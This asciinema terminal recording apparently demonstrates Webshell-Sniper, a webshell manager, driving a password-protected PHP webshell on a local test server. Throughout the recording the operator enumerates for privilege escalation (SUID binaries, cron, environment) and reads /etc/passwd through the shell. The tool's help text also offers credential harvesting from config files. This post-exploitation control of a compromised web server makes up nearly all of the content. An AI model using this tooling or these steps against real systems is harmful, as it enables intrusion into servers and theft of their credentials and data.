{"version": 2, "width": 104, "height": 32, "timestamp": 1782486832, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}}
[0.1848, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/index.php (password='c') ...\u001b[0m\r\n"]
[0.1881, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1881, "o", "\u001b[1;32m[+] 1 webshell(s) online. Entering interactive mode.\u001b[0m\r\n"]
[0.1932, "o", "\u001b[?12l\u001b[?25h"]
[0.1967, "o", "\r\n===================================================\r\n           ____        _\r\n          / ___| _ __ (_)_ __   ___ _ __\r\n          \\___ \\| '_ \\| | '_ \\ / _ \\ '__|\r\n           ___) | | | | | |_) |  __/ |\r\n          |____/|_| |_|_| .__/ \\___|_|\r\n                      |_|\r\n===================================================\r\n|      WebShell Manager Via Terminal (v2.0.0)     |\r\n|  https://github.com/WangYihang/Webshell-Sniper  |\r\n===================================================\r\n\r\n"]
[0.1976, "o", "\u001b[6n"]
[0.1992, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[0.2017, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2137, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2764, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3389, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.4015, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.4643, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.527, "o", "\u001b[?25l\u001b[?7l\u001b[18D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[18D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.527, "o", "\u001b[?2004l"]
[3.5328, "o", "\u001b[38;5;208mUsage:\u001b[0m \u001b[38;5;244mrecon\u001b[0m [\u001b[36m-h\u001b[0m] \u001b[36m<action>\u001b[0m \u001b[36m...\u001b[0m\r\n\r\n\u001b[39mTarget reconnaissance.\u001b[0m\r\n\r\n\u001b[38;5;208mOptions:\u001b[0m\r\n  \u001b[36m-h\u001b[0m, \u001b[36m--help\u001b[0m      \u001b[39mshow this help message and exit\u001b[0m\r\n\r\n\u001b[38;5;208mActions:\u001b[0m\r\n  \u001b[36m<action>\u001b[0m\r\n    \u001b[36minfo\u001b[0m          \u001b[39mtarget summary (URL/webroot/php/kernel)\u001b[0m\r\n    \u001b[36mphp\u001b[0m           \u001b[39mPHP version\u001b[0m\r\n    \u001b[36mkernel\u001b[0m        \u001b[39mkernel version (uname -a)\u001b[0m\r\n    \u001b[36mconfigs\u001b[0m       \u001b[39mfind config/DB files in the webroot\u001b[0m\r\n    \u001b[36mwritable\u001b[0m      \u001b[39mfind writable directories\u001b[0m\r\n    \u001b[36mwritable-php\u001b[0m  \u001b[39mfind writable .php files\u001b[0m\r\n    \u001b[36mdisabled\u001b[0m      \u001b[39mlist PHP disabled_functions\u001b[0m\r\n    \u001b[36msuid\u001b[0m          \u001b[39mfind SUID-root binaries\u001b[0m\r\n"]
[3.5328, "o", "    \u001b[36mprivesc\u001b[0m       \u001b[39maggregate privesc enumeration\u001b[0m\r\n    \u001b[36mcreds\u001b[0m         \u001b[39mharvest credentials from config files\u001b[0m\r\n\r\n\r\n"]
[3.5336, "o", "\u001b[6n"]
[3.5346, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5357, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.3265, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon\u001b[4D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.388, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.4496, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.5111, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.5728, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.6344, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.6962, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.7579, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8198, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8814, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9434, "o", "\u001b[?25l\u001b[?7l\u001b[23D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33minfo\u001b[23D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[5.9441, "o", "\u001b[1;32m[+] ========================================\u001b[0m\r\n"]
[5.9441, "o", "\u001b[1;32m[+] URL           : http://127.0.0.1:8080/index.php\u001b[0m\r\n"]
[5.9442, "o", "\u001b[1;32m[+] Method        : POST\u001b[0m\r\n"]
[5.9483, "o", "\u001b[1;32m[+] Document root : /var/www/html\u001b[0m\r\n"]
[5.9492, "o", "\u001b[1;32m[+] PHP version   : 8.3.31\u001b[0m\r\n"]
[5.9534, "o", "\u001b[1;32m[+] Kernel        : Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 \u001b[0m\r\n\u001b[1;32m19:26:24 UTC 2026 x86_64 GNU/Linux\u001b[0m\r\n"]
[5.954, "o", "\u001b[6n"]
[5.9546, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9554, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[7.9479, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon info\u001b[9D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.0097, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.0714, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.133, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.1948, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.2567, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.3189, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.3815, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.4435, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.5053, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.567, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.6289, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.6908, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.7526, "o", "\u001b[?25l\u001b[?7l\u001b[26D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33mprivesc\u001b[26D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[8.7532, "o", "\u001b[95m[+] [enum] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[8.8299, "o", "\u001b[1;32m[+] == whoami ==\u001b[0m\r\n"]
[8.83, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[8.8301, "o", "\u001b[1;32m[+] == sudo ==\u001b[0m\r\n"]
[8.8303, "o", "sh: 1: sudo: not found\r\n\u001b[1;32m[+] == kernel ==\u001b[0m\r\n"]
[8.8304, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64\r\nGNU/Linux\r\n"]
[8.8304, "o", "\u001b[1;32m[+] == cron ==\u001b[0m\r\n"]
[8.8307, "o", "total 20\r\ndrwxr-xr-x 1 root root 4096 Jun 11 00:28 .\r\ndrwxr-xr-x 1 root root 4096 Jun 23 10:35 ..\r\n-rwxr-xr-x 1 root root  539 Jan 27 22:53 apache2\r\n-rwxr-xr-x 1 root root 1478 Jun 24  2025 apt-compat\r\n-rwxr-xr-x 1 root root  123 Dec 16  2025 dpkg\r\n"]
[8.8308, "o", "\u001b[1;32m[+] == capabilities ==\u001b[0m\r\n"]
[8.8309, "o", "sh: 1: getcap: not found\r\n"]
[8.8309, "o", "\u001b[1;32m[+] == suid ==\u001b[0m\r\n"]
[8.8313, "o", "/usr/bin/chsh\r\n/usr/bin/newgrp\r\n/usr/bin/mount\r\n/usr/bin/umount\r\n/usr/bin/gpasswd\r\n/usr/bin/passwd\r\n/usr/bin/chfn\r\n/usr/bin/su\r\nfind: '/var/cache/apt/archives/partial': Permission denied\r\nfind: '/var/cache/ldconfig': Permission denied\r\nfind: '/etc/ssl/private': Permission denied\r\nfind: '/root': Permission denied\r\n"]
[8.8314, "o", "\u001b[1;32m[+] == listening ==\u001b[0m\r\n"]
[8.8314, "o", "sh: 1: netstat: not found\r\n"]
[8.8315, "o", "\u001b[1;32m[+] == env ==\u001b[0m\r\n"]
[8.8327, "o", "APACHE_CONFDIR=/etc/apache2\r\nHOSTNAME=5dd92056d40a\r\nPHP_INI_DIR=/usr/local/etc/php\r\nSHLVL=0\r\nPHP_LDFLAGS=-Wl,-O1 -pie\r\nAPACHE_RUN_DIR=/var/run/apache2\r\nPHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_VERSION=8.3.31\r\nAPACHE_PID_FILE=/var/run/apache2/apache2.pid\r\nGPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 \r\nAFD8691FDAEDF03BDF6E460563F15A9B715376CA\r\nPHP_ASC_URL=https://www.php.net/distributions/php-8.3.31.tar.xz.asc\r\nPHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_URL=https://www.php.net/distributions/php-8.3.31.tar.xz\r\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\nAPACHE_LOCK_DIR=/var/lock/apache2\r\nLANG=C\r\nAPACHE_RUN_GROUP=www-data\r\nAPACHE_RUN_USER=www-data\r\nAPACHE_LOG_DIR=/var/log/apache2\r\nPWD=/var/www/html\r\nPHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             \r\nlibc-dev                make            pkg-config              re2c\r\nPHP_SHA256=66410cee07f4b2baeb0843140bb2a2b52ef930b5cf9b3d6e6d158b33aae8fa37\r\nAPACHE_ENVVARS=/etc/apache2/envvars\r\n"]
[8.8331, "o", "\u001b[6n"]
[8.8342, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.8355, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.3679, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.4305, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;32mcd\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.4935, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.5564, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.6184, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.6802, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.7419, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.8036, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.8654, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9271, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9888, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0506, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.1125, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.1744, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.2365, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.2984, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.3599, "o", "\u001b[?25l\u001b[?7l\u001b[29D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mcd\u001b[0m \u001b[0;33m/var/www/html\u001b[29D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[12.3636, "o", "\u001b[1;32m[+] cwd: /var/www/html\u001b[0m\r\n"]
[12.3644, "o", "\u001b[6n"]
[12.3656, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.367, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.9752, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.0379, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.0999, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.1624, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.2249, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.2866, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.3483, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.4099, "o", "\u001b[?25l\u001b[?7l\u001b[32D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mls\u001b[32D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.41, "o", "\u001b[?2004l"]
[14.4118, "o", "\u001b[95m[+] [ls] POST http://127.0.0.1:8080/index.php (password='c'): /var/www/html\u001b[0m\r\n"]
[14.4149, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmode      \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36msize\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmtime           \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mname     \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 -rw-rw-r-- \u2502 129  \u2502 2026-06-23 18:29 \u2502 index.php \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[14.4155, "o", "\u001b[6n"]
[14.4161, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.4169, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.4263, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[0;38;2;102;102;102mile ls\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.488, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.5498, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.6114, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.673, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.7347, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.7964, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.8581, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.9197, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.9813, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.043, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1048, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1664, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.2281, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.2898, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.3518, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.4138, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.4757, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5377, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5996, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.6615, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.7234, "o", "\u001b[?25l\u001b[?7l\u001b[46D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mfile\u001b[0m \u001b[0;33mread\u001b[0m \u001b[0;33m/etc/passwd\u001b[46D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[17.7242, "o", "\u001b[95m[+] [read] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[17.7268, "o", "root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\r\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\r\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\r\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\r\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\r\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\r\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\r\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\r\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\r\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\r\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\r\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\r\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\r\n\r\n"]
[17.7273, "o", "\u001b[6n"]
[17.7279, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.729, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.9405, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0023, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0639, "o", "\u001b[?25l\u001b[?7l\u001b[27D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > id\u001b[27D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[20.0645, "o", "\u001b[95m[+] [remote] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[20.0675, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[20.0684, "o", "\u001b[6n"]
[20.0695, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0708, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.8802, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.942, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.0038, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.0659, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.1281, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mlocal\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.19, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mlocal\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[22.1907, "o", "\u001b[95m[+] Bare commands now run on localhost (the prompt shows LOCAL).\u001b[0m\r\n"]
[22.1912, "o", "\u001b[6n"]
[22.1919, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html >\u001b[23D\u001b[24C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.1927, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4003, "o", "\u001b[?25l\u001b[?7l\u001b[0mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4624, "o", "\u001b[?25l\u001b[?7l\u001b[0mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5243, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.586, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.6482, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.71, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7718, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html > whoami\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[23.7724, "o", "\u001b[95m[+] [local] whoami\u001b[0m\r\n"]
[23.7736, "o", "ubuntu\r\n"]
[23.7744, "o", "\u001b[6n"]
